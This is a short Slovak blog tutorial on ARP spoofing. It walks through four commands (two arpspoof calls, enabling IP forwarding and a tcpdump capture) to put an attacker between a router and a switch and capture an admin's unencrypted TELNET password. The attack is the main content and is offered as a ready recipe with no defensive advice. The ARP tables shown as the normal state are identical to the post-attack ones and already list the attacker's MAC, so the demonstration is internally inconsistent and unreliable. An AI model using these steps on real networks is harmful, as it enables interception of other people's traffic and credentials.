Odpočúvanie v sieti – ARP spoofing attack

Je možné, aby niekto odchytil celú vašu komunikáciu v sieti alebo do internetu? Áno, a pomocou útoku ARP spoofing je to veľmi jednoduché. Stačia na to 4 príkazy.

Ukážeme si to na jednoduchom príklade. Budeme odchytávať komunikáciu medzi routrom R1 a switchom SW1. Naša útočná stanica má názov KALI.

Povedzme, že chceme odchytiť administrátorské meno a heslo admina, ktorý sa prihlasuje z SW1 na R1 pomocou protokolu TELNET, ktorý je nešifrovaný.

Protokol ARP (Address Resolution Protocol)

Slúži na mapovanie IP adries a MAC adries. Je kriticky dôležitý pre fungovanie celej siete. Takto vyzerajú ARP tabuľky R1 a SW1 za normálneho stavu.

R1#sh ip arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  172.16.99.1             -   0014.a832.7b37  ARPA   FastEthernet1.99
Internet  172.16.99.3             0   b827.eb79.876b  ARPA   FastEthernet1.99
Internet  172.16.99.100           0   b827.eb79.876b  ARPA   FastEthernet1.99

SW1#sh ip arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  172.16.99.100           7   b827.eb79.876b  ARPA   Vlan99
Internet  172.16.99.3             -   001b.54ce.e2c1  ARPA   Vlan99
Internet  172.16.99.1             0   b827.eb79.876b  ARPA   Vlan99

Aby sme mohli odpočúvať komunikáciu medzi R1 a SW1, potrebujeme spraviť nasledujúce 4 kroky:

1. Odpočúvanému hostovi povieme, že my sme router, resp., že naša MAC adresa patrí k IP adrese routra R1.

# arpspoof -t [IP adresa SW1] [IPadresa R1]

# arpspoof -t 172.16.99.3 172.16.99.1

2. Routru R1 povieme, že my sme odpočuvaný switch SW1, resp., že naša MAC adresa patrí k IP adrese SW1. Tento príkaz spustíme v novom konzolovom okne, súčasne s príkazom v prvom kroku.

# arpspoof -t [IPadresa R1] [IP adresa SW1]

# arpspoof –t 172.16.99.1 172.16.99.3

3. Povolíme preposielanie packetov cez nás.

# echo 1 > /proc/sys/net/ipv4/ip_forward

4. Zapneme odchytávanie packetov do súboru.

# tcpdump host 172.16.99.3 and not arp -w capt1.cap

To je všetko. Pozrime si ARP tabuľku R1 a SW1. Môžeme si všimnúť, že MAC adresa útočníka (b827.eb79.876b) sa objavila aj pri IP adresách zariadení, ktoré chceme odpočúvať.

R1#sh ip arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  172.16.99.1             -   0014.a832.7b37  ARPA   FastEthernet1.99
Internet  172.16.99.3             0   b827.eb79.876b  ARPA   FastEthernet1.99
Internet  172.16.99.100           0   b827.eb79.876b  ARPA   FastEthernet1.99

SW1#sh ip arp
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  172.16.99.100           7   b827.eb79.876b  ARPA   Vlan99
Internet  172.16.99.3             -   001b.54ce.e2c1  ARPA   Vlan99
Internet  172.16.99.1             0   b827.eb79.876b  ARPA   Vlan99

Po otvorení súboru vo Wireshark, kde sme zachytili dáta, vidíme všetku komunikáciu medzi R1 a SW1. Ak ide o nešifrovaný protokol, ako napríklad TELNET, môžeme vidieť aj obsah komunikácie.

Ak vás tento článok zaujal a chcete dostávať mailovú notifikáciu, pri publikovaní podobných článkov o hackingu, sieťovej bezpečnosti, Linux serveroch, Cisco zariadeniach, či o programovaní, môžete sa prihlásiť na odber článkov.